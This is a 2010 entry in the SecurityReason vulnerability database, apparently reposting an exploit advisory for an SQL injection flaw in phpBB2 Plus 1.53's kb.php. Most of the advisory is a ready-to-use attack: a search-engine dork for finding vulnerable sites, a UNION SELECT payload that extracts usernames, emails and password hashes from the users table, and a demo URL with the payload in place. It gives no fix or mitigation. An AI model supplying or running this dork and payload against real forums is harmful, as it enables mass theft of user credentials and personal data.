Bezpieczeństwo informacji

, Wiadomości IT, Audyt bezpieczeństwa
Rejestracja | Zapomniałem hasła | Zaloguj się
Polski Polski  Angielski Angielski
Szukaj :
SecurityReason
WLB
Audyt
RSS
Zespół
Informacja

Jeśli znalazłeś interesujący błąd i chcesz go nam wysłać, użyj adresu:
secalert(.)securityreason(.)pl

Twój exploit może być opublikowany w dziale ExploitAlert. Wyślij go nam na adres:
exploit(.)securityreason(.)pl

Strona główna arrow Baza WLB          

  Tytuł : phpBB2 Plus 1.53 SQL injection vulnerability
  WLB : WLB-2010030076  (Szczegóły)
  Data publikacji : 2010-03-19
  Autor          : Gamoscu
  Poziom ryzyka : Średni  Poziom Średni  (Szczegóły)
  Zdalny błąd : Tak
  Lokalny błąd : Nie
  Status   : Bład

  Historia :
[2010-03-19] Publikacja

  Podatne oprogramowanie :  

phpBB2 Plus 1.53 SQL


  Tekst :  

phpBB2 Plus 1.53 (kb.php?mode) SQL Injection Vulnerability

###########################

Author : Gamoscu

Homepage : http://www.1923turk.com

Blog : http://gamoscu.wordpress.com/

Dork : inurl:kb.php?mode=cat&cat=
###########################

[ Vulnerable File ]

kb.php?mode=cat&cat= [ SQL ]


[ XpL ]

-1+union+select+1,concat(user_id,char(58),username,
char(58),user_email,char(58),user_icq,char(58),use
r_password),3,4,5,6+from+phpbb_users+limit+1,2--


[ Demo]

http://www.xxxxx/xxxxxx/kb.php?mode=cat&cat=-1+union+select+1,concat(user_i
d,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_pas
sword),3,4,5,6,7+from+phpbb_users+limit+1,2--




################################################## ############
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci -
X-TRO
################################################## ############

  Referencje :  

None


Jeżeli chcesz zmienić powyższą note, prosze użyj UCP


Apache rss
PHP rss
Patronat

Szkolenia ISecMan

ISecMan

Szkolenia Multitrain

Multitrain

Copyright © SecurityReason. All Rights Reserved.